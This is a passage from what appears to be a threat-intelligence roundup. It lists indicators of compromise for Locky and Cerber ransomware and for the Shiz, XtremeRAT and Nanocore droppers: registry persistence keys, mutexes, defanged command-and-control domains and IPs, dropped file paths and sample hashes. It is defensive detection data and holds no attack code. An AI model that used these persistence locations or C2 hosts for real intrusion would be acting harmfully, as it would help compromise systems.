Global\<random guid> 26
Files and or directories created Occurrences
%TEMP%\~TMDB5A.tmp 2
%TEMP%\~TMDB99.tmp 2
%TEMP%\~TM314F.tmp 1
%TEMP%\~TM31DD.tmp 1
%TEMP%\~TMDBC8.tmp 1
%TEMP%\~TMDC25.tmp 1
%TEMP%\~TME21E.tmp 1
%TEMP%\~TMDC93.tmp 1
%TEMP%\~TME2BB.tmp 1
%TEMP%\~TME337.tmp 1
%TEMP%\~TME3A5.tmp 1
%TEMP%\~TME0D6.tmp 1
%TEMP%\~TMDBF7.tmp 1
%TEMP%\~TME164.tmp 1
%TEMP%\~TMD977.tmp 1
%TEMP%\~TMD9E5.tmp 1
%TEMP%\~TMD9C5.tmp 1
%TEMP%\~TMDA42.tmp 1
%TEMP%\~TME0F5.tmp 1
%TEMP%\~TME173.tmp 1
%TEMP%\~TMDBE8.tmp 1
%TEMP%\~TMDCC1.tmp 1
%TEMP%\~TMDF60.tmp 1
%TEMP%\~TMDD2F.tmp 1
%TEMP%\~TMDFED.tmp 1
*See JSON for more IOCs

File Hashes

03ba150882170b2cfee8c30f556c2be840697b7cc1e7dcc47594dd3bd9758c7b 0eb56bcb11905ba125c5d4e2527fa4441b03f6ce0278269498be539833b5bbe9 1368aa53291ec289ffa8bb86c5ec7c335350a10a240b88e31a3b2d1181fa785f 169b28a24d77797b1c2a61dda32b7d766d6f150bcefdf2333ca635a7b4837778 18465059a485b9f35a472b16d8fec399c795799d3dff1dab57d537e620749902 1c3bde330d7cfe197ecfab80309e463d6e6e61bdf6885d250cb0b08c5f98b767 1cd1a5d2b64aef0c352e7984ae3822c9f6d661d8907526aacd2b6321a4f7a8fd 1d548c85594dc4b83ac1c69ac82da842dc68eac75f683aed693929c728c83184 1fd5e9430201472831856a7720fee930a1555f9b134af3145f1acc5a7f712a82 250c9cf38912e781afc5b32907da411279f7b22b4b2e6b97729aad81a1e0f48a 29ca8b176e9977bf0d3bdc9f214665b89f087ba0799e9d9e22bddfecc4bb7e09 29fbd2e07f2bcdac0a69364621df335bf899787c48353f7e448e302263d0cee1 2e00b1d9d04175dd0a8101ac3222dde48833693400a9684717fddceb532ae258 315ab01236a2ccb7231731878bf7d7fb23d9c6fd9603c7df3501f453f3ec76c1 31bb435f6ce6446d3ce1c97cb80de5084d30abff6fc9711c6d0b0c191031b361 35d9d318da08e7ff963b14fcb2f73fb178374688b21a27ba872f87fb353405eb 377406362d74f2789685c3a0aa128312bf82b092f9c047a36fb1d62e22348a8d 38cd0e89eb7ab0edc2cee7f2edfa86e938a5963ed6ae3212b1c26bf2722cb75a 3921b067ddb8b3fe65e9f8c680f46d72ac52077334cfba1c8ee1192d84bb44cd 395e9fdef9e5694c3a2e8e5ecce9ced85cac141ad2a0d4851620c596ed5eb32a 3cae2eed75c901adbff0fc907433d56f5caeacafade3666eb90b39956add686c 3f72bd0dbdbbb4f9ea83fe224363dc423f8d6f88df526c69431c892938ff2360 40013e1bd081743d85e878edb53179b70546bf6c8ff3ac03f5c0fbf2f590967e 405b9a602c73ce29d1f4e5ab15bf3a5c51a8b087bf6ae7dbf064a48817d1532b 48d7d44420db0625d5d05caf04aac82f3e3daeff65f4d6b9c33cb94c3b939566
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Locky-9963624-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: FaviconPath
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: Deleted
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
Value Name: DefaultScope
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS\DIAG\VSSAPIPUBLISHER 16
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} 16
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\intl.cpl,-1
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\intl.cpl,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\hgcpl.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-100
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-101
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-102
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-103
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\devmgr.dll,-4
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\devmgr.dll,-5
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\icardres.dll,-4097
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\icardres.dll,-4098
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\PerfCenterCPL.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\appwiz.cpl,-160
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\netcenter.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\wpccpl.dll,-101
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\autoplay.dll,-1
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\autoplay.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\SyncCenter.dll,-3001
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\recovery.dll,-101
1
Mutexes Occurrences
Global\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 16
Local\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 16
Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!16613a8 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 10
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]bing[.]com 16
Files and or directories created Occurrences
\Users\Default\NTUSER.DAT.LOG 16
%ProgramData%\Mozilla\logs\maintenanceservice-install.log 16
%ProgramData%\Sun\Java\Java Update\jaureglist.xml 16
%ProgramData%\Microsoft\RAC\StateData\RacMetaData.dat 16
%ProgramData%\Adobe\Updater6\AdobeESDGlobalApps.xml 16
%ProgramData%\Microsoft\IlsCache\ilrcache.xml 16
%ProgramData%\Microsoft\IlsCache\imcrcache.xml 16
%ProgramData%\Microsoft\User Account Pictures\admin.dat 16
%HOMEPATH%\Desktop\lukitus.bmp 16
%HOMEPATH%\Desktop\lukitus.htm 16
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0 16
\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I-J19 16
\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I-J1 16
\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I- 16
\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\0PZW71P4- 16
*See JSON for more IOCs

File Hashes

1afe66e4aaf044636b8bfb0e625e8182a7bb116cfa3b4673ed102094c55b8f84 1cdcb07c8a79bdb3faad6feae4b2720cec8dc8de0cfb1431502f91e8c9152e94 244f76876485ad65f57466338fee2a571057c6315ba9a9699d89ff0add323e72 3140bd4af08e8d487c04c24cb3a6977464ef6bfed46e3f54ba52175b09ceee41 37621fe42fb7154d158b82e54b8735ad876902e8f55178387254689802f8d419 56ee0ae4072920f29e35c10af707ac97bc87ba4191aca1afec235d7a5a96de10 659f0b2aa1699e98b57433d85b08f56fef032fcdce4858cfcf21bb405e784bc2 7af3b8e631e7d557b4039cca14f0f5ad2686b3dab6a81da181ab46e2518b4fcd 8d62a963beb4ac49096277d54d3d6bc78c1142ff30b600b0373256eaa6b7a73c 9be2a26538acb1111657ab79c6680d7f8bde43f5a6e51f38c674967e21d69627 c6f8e43f2db3725ea18520ff3b5370a32ef28c62fe1a82df1575c1003ac10acf ce8d65f815402e4bc06fade45b66398930ae73d6e5c9368564c87745643703dd da37a954efc572ccd4f5f43912e1b041acce412d8f4cfac31a23349adb7e43c5 ed96e3c04c7af4bb0863e2e4091e1280ced24a5f68c9712ffba34062d7a46229 f681a28f44ca9a7fe31e4fce8881aafaf125727dafd4db68280cfe6ea6f9e0e8 fdacb9b5a9551464e1bba01a3f279d247c2b3c7d0e4b5768763fcf26bb4e5837

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Shiz-9963681-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
21
Mutexes Occurrences
Global\674972E3a 21
Global\MicrosoftSysenterGate7 21
internal_wutex_0x000004b4 21
internal_wutex_0x0000043c 21
internal_wutex_0x<random, matching [0-9a-f]{8}> 21
internal_wutex_0x000004dc 20
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 15
45[.]33[.]30[.]197 7
45[.]33[.]23[.]183 5
96[.]126[.]123[.]244 4
45[.]56[.]79[.]23 4
45[.]33[.]2[.]79 4
45[.]79[.]19[.]196 3
45[.]33[.]20[.]235 3
72[.]14[.]185[.]43 3
198[.]58[.]118[.]167 2
45[.]33[.]18[.]44 2
173[.]255[.]194[.]134 2
72[.]14[.]178[.]174 2
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
rynikulokop[.]eu 21
lyvoguraxeh[.]eu 21
xuxetiryqem[.]eu 21
puzewilurip[.]eu 21
cilynitiseg[.]eu 21
vojizitoken[.]eu 21
fogokozazit[.]eu 21
gadedozymiz[.]eu 21
masytoturen[.]eu 21
nofagoteveg[.]eu 21
jepuqoxupit[.]eu 21
qetunopifef[.]eu 21
kericoxojil[.]eu 21
ryqozapaleb[.]eu 21
lymajaxecir[.]eu 21
xubysaxywil[.]eu 21
dixonesohed[.]eu 21
marawukyqos[.]eu 21
dikuvizigiz[.]eu 21
puvutaputeb[.]eu 21
ciciqacidir[.]eu 21
ryhuneqevyv[.]eu 21
kejywajazok[.]eu 21
xudakejupok[.]eu 21
lygivejynow[.]eu 21
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 21

File Hashes

0ddc226c722e18199274ea9f05f0bebdfd0e871713b53e89dc094fd53fbf21fb 12fbf08de48d56346c43dfc4369e7c70c71023e7322f84991591fcde46aa5532 1b56b352ab8e26ce29fabdc5ce020e616db96b6004ee540e88fef580b16a4f78 1d65fa03284d71963c8ec3cee40b25afdc06d9f6f6404d214ca0091c0130cb53 232a41bbdda2fe1b5e7b90c7beb1136b671d127a400699b6591278c44eb828a2 3a7f6106cbe35dcd0c7f25bb6c4b1fc9c19eb348cafba007121f03e74c6d73e2 4d0d263dc8c8f69d6cbcfb13564f53d70955772552e9a4e32aa5a14851bdd1ac 4dfcf95c402c12d20034ac961076c2772f835a9aa442d7062b914a2f53f37f9b 5077b57947941ef15fb8445db7819e641fd5499067969e38f680d2cb6f6430a0 54b0b511221b0498f1c5a2eeb0e2ae633cae232cf75c13fa9eaff6f711cebef1 5b0787632726f2d55a209f853f04eea8109d87cd9630be7e8a42a384bd8cb7a5 6820579b06e8cb0e4298270a497b475baf2645430b4c62d4a3e22f4d7c7bc0ee 69b5080868bfbdc18d868318cb6be406c4cc268fe4e183e5e81f62c7e6922fd9 69e5f2613c4aad5956e83985743210ae058862c12e3d7f104537f6efd0aa1c51 7324bb74d697cb54b2acfa41ab0caab30a14e40b8628b50acdfd4d26b1dfba17 7807700902786f550ce24bb63e93e62e35527857a24f2b655467dd243c40e5d3 79c880d0a639206d2ad9a77647940b11b9200680431e98fc155410f855354be8 85b1e95b8a1be8d5a16525b879d9e8e9a7a1f491449d036f08504b9e9f118b96 91c02affdcd16a87eb278a461fdabaa021ab4d5b7987a24d162563012ba49bcc a38da3b0920e292f513272bfe95c0d5debd6e201cb63d2526fe25c6293b8ed0e d19619fd50ebefcc45deb67abe2d2aab162806fcfd41db0765c7ddf96cdb02b9

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.XtremeRAT-9963701-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
9
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 9
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: InstalledServer
8
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: ServerStarted
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCU
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
Value Name: StubPath
4
<HKCU>\SOFTWARE\((MUTEX)) 3
<HKCU>\SOFTWARE\((MUTEX))
Value Name: InstalledServer
3
<HKCU>\SOFTWARE\((MUTEX))
Value Name: ServerStarted
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLX
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCL
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7OFBR713-LB7J-5G81-7WC8-161211U08C56}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7OFBR713-LB7J-5G81-7WC8-161211U08C56} 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\XTREMERAT
Value Name: TDados
1
<HKCU>\SOFTWARE\SS 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{11AKP4MN-X763-4313-1615-X6G4IX7N4S25} 1
<HKCU>\SOFTWARE\SS
Value Name: ServerStarted
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{M0J1AY7S-64N4-SUDU-RQ0E-5HNUA5PF0MI0} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ss
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ss
1
Mutexes Occurrences
XTREMEUPDATE 12
<random, matching [a-zA-Z0-9]{5,9}> 9
<random, matching [a-zA-Z0-9]{5,9}>PERSIST 8
<random, matching [a-zA-Z0-9]{5,9}EXIT> 8
((Mutex)) 3
((Mutex))PERSIST 2
((Mutex))EXIT 2
STUBXTREMEINJECTED 1
ss 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
dstar[.]hopto[.]org 1
may00[.]zapto[.]org 1
Files and or directories created Occurrences
%TEMP%\x.html 10
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg 8
%APPDATA%\Microsoft\Windows\((Mutex)).cfg 3
%SystemRoot%\InstallDir 2
%APPDATA%\InstallDir 2
%APPDATA%\InstallDir\dll.exe 2
%SystemRoot%\InstallDir\Server.exe 1
%ProgramFiles(x86)%\ISSA.exe 1
%ProgramFiles(x86)%\ss.exe 1
%APPDATA%\Microsoft\Windows\ss.cfg 1
%APPDATA%\Microsoft\Windows\ss.dat 1
%APPDATA%\Microsoft\Windows\SpUDj.dat 1
%SystemRoot%\GOOGLE.exe 1
%APPDATA%\windoy.exe 1
%SystemRoot%\SysWOW64\windoy.exe 1
%APPDATA%\soft.exe 1
%SystemRoot%\SysWOW64\soft.exe 1
%SystemRoot%\InstallDir\browse.exe 1
%SystemRoot%\SysWOW64\migc.exe 1
%APPDATA%\migc.exe 1
%SystemRoot%\CREATE.exe 1

File Hashes

00c5b7cc78f982e42062c84a8a5c1c5aaeea7276b0f00635d61e4bfdcf6ed4b2 05316395bee1b9759134e86ecf28413d197c95cc6c25bb96a3fd957adfb767fe 10f0a0f8b51964b8a3fc497040601a48fe0493a7e4010ee89e61068cc8e2d92d 33ed0e091cc5ccc71d0a9d37c4f82d73f3959ffcd55f9c2f8660e7e13f68393e 3e5302bb99e282cd9303eda70e64589529704b3c2edee6637cb040887b02f42f 593d60c61df90a5de77d5ee31815eafd3c2657f1581cdd7fe36e74f72956a7e3 62243f0a6f197f167173d12b985b2bbd4a8f98864eb4f99c77e28a9f561f4b0d 6798aa4e8218c8783acab06e700b519eb31856ac0e46c6c82f5dfbf22e13ddb5 9906c6c6ce2eb7199023bbfcff346303f08dab61f475da22fe358f0e09d083bd c11cd59cb06cf9e1a9f95e3d78300a2aa8edf94ed7964b73ccb7135a5b23a7d6 d20e8dd51f00f03a0aacfcc4989d86411e2bc6c6f0a91961f420a056a86eef07 d8df5b44e3469d7a7c0ffc4dba88d34bff093cf4453500074a54b837d50d93c6

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Nanocore-9963905-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 20 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jVULYR
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WGmLd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ddnKQs
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: capsole
1
Mutexes Occurrences
8-3503835SZBFHHZ 1
NL20T01E6BXGZI09 1
fKZhNqRta 1
Global\{bbc5d79f-8cc7-4aa7-b9fa-0c15cee443cd} 1
GfAQbAoN 1
GZVlUzSZeINZ 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
149[.]154[.]167[.]220 2
208[.]91[.]199[.]224 1
208[.]91[.]198[.]143 1
208[.]91[.]199[.]223 1
205[.]134[.]234[.]70 1
107[.]182[.]129[.]128 1
162[.]0[.]229[.]41 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]telegram[.]org 2
mail[.]albacon-ojeda[.]pe 1
smtp[.]saudlunion[.]com 1
smtp[.]transmase[.]com 1
smtp[.]utt-ae[.]com 1
brightnano1[.]ddns[.]net 1
mail[.]fasttunpcbs[.]com 1
Files and or directories created Occurrences
%System32%\Tasks\Updates 6
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 6
%System32%\drivers\etc\hosts 3
%APPDATA%\jVULYR 2
%APPDATA%\jVULYR\jVULYR.exe 2
%ProgramFiles(x86)%\AGP Manager 1
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 1
%System32%\Tasks\AGP Manager 1
%System32%\Tasks\AGP Manager Task 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\catalog.dat 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bin 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\storage.dat 1
%APPDATA%\WGmLd 1
%APPDATA%\WGmLd\WGmLd.exe 1
%APPDATA%\ddnKQs 1
%APPDATA%\ddnKQs\ddnKQs.exe 1
%APPDATA%\HFkIOmiwFQY.exe 1
%System32%\Tasks\Updates\HFkIOmiwFQY 1
%APPDATA%\h0gct1lm.mo4 1
%APPDATA%\h0gct1lm.mo4\Firefox 1
*See JSON for more IOCs

File Hashes

1f41465839f9e90dc6298156eb0f0eab361414c1dc207c22e2593e608dc6f5d5 28d4e2a68e9b5db5a71cbd94fcaa241dfd1937e99eadbddab572ff4efab999d7 2b61ef6e2d493e4eb8bd0ce74d2cf9fb7de72245ec0e76afe9198b9518f2cb40 2c04f3b128381e4f3e3687566623fd653d7a211dfdd17efd94317bebaae1b78b 35157e080e4f612ef306a1195e55ce5068844cc7daf3442d0f73c98c224d4c9d 35ad1d5553d61763b2e94c6e4d66cd5b6cba0578736f202a12c88525b9125804 420c5ccde64ea630f1223e27d1cae8b0887aca1a4e87d6f9c307011c0e266bf9 43f5c35dc913dbd764a028b5686d0a3c47bcb745c3b277b778742e22989784ca 46675d5b6e4c352b50804c760bf4ef3174a8ef93b875f1b7e0f343e22573a6c5 6b4bbd2e534c8e089691829e219ea54c8e113012f1ecb6d912a5d791c7157c2e 7605008ef9c187be6862403b9a5eef21eb271ff656db288759a50dc3785caeeb 76b3123c5245713b390b8f28fafddddef75a55199621a196124e9c55ac55d1af 878a27d70fd8b04b70298f1e102053e02faeaab461a8455fdf843262118231ad 9238603739f090fa4b311ab4c76739c1b54d21e410139c6be208025b4dd7a33f a2631bee5c6505f12449f250e56d2091a50fd25d876ad49efefeb4ea7f63e45d b863d3d875966054e0a8a19ae649a08ecf80a2be46b937c5f6d0a634cba4e465 ce88fb263d3e6a38cac9d2b4ec0f27bfc724d46b4d274fc7adb25330bae9e724 daf4c0820c45f6be84cf248504e10bfee063ea6fc8de3b397adaa6682e4bb610 e06d33553621160bf21cdc08eaecb5e977a59e6e416c37922a6d263620141a7d fa0ddfe8dd1e9509529086469444221a673fb0d16f380c968150a7a53f68b0d9

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9964084-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
26
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
26
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\CURRENTUSERLEXICON\\FILES 1
<HKCU>\SOFTWARE\MICROSOFT\SPEECH\CURRENTUSERLEXICON\\FILES
Value Name: Datafile
1
